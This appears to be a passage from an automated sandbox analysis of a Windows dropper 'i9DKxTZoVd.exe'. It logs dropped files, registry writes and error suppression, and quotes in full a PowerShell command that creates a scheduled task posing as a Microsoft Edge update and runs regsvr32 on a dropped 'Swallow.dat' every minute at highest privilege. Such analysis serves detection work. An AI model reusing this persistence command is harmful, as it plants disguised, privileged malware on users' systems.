Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFB5B8A00BD pushad ; iretd 10_2_00007FFB5B8A00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFB5B79D2A5 pushad ; iretd 12_2_00007FFB5B79D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFB5B8B7542 push ebx; iretd 12_2_00007FFB5B8B754A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFB5B8B00BD pushad ; iretd 12_2_00007FFB5B8B00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFB5B982566 push 8B485F91h; iretd 12_2_00007FFB5B98256B
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TP7FD.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\Desktop\i9DKxTZoVd.exeFile created: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpFile created: C:\Users\user\AppData\Local\Temp\is-LKP6G.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpFile created: C:\Users\user\AppData\Roaming\is-N7DV6.tmpJump to dropped file
Source: C:\Users\user\Desktop\i9DKxTZoVd.exeFile created: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpFile created: C:\Users\user\AppData\Local\is-8SV5O.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpFile created: C:\Users\user\AppData\Local\Temp\is-LKP6G.tmp\_isetup\_shfoldr.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpFile created: C:\Users\user\AppData\Roaming\Swallow.dat (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TP7FD.tmp\_isetup\_shfoldr.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpFile created: C:\Users\user\AppData\Local\unins000.exe (copy)Jump to dropped file

Boot Survival

barindex
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AF4B0CC-A257-4A7E-E201-D5DF536679FB}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\regsvr32.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\D1B229C21A0A68AF7DA7312615A134A4 4227e685a575a865fa232fa6c9abd427Jump to behavior
Source: C:\Users\user\Desktop\i9DKxTZoVd.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\i9DKxTZoVd.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
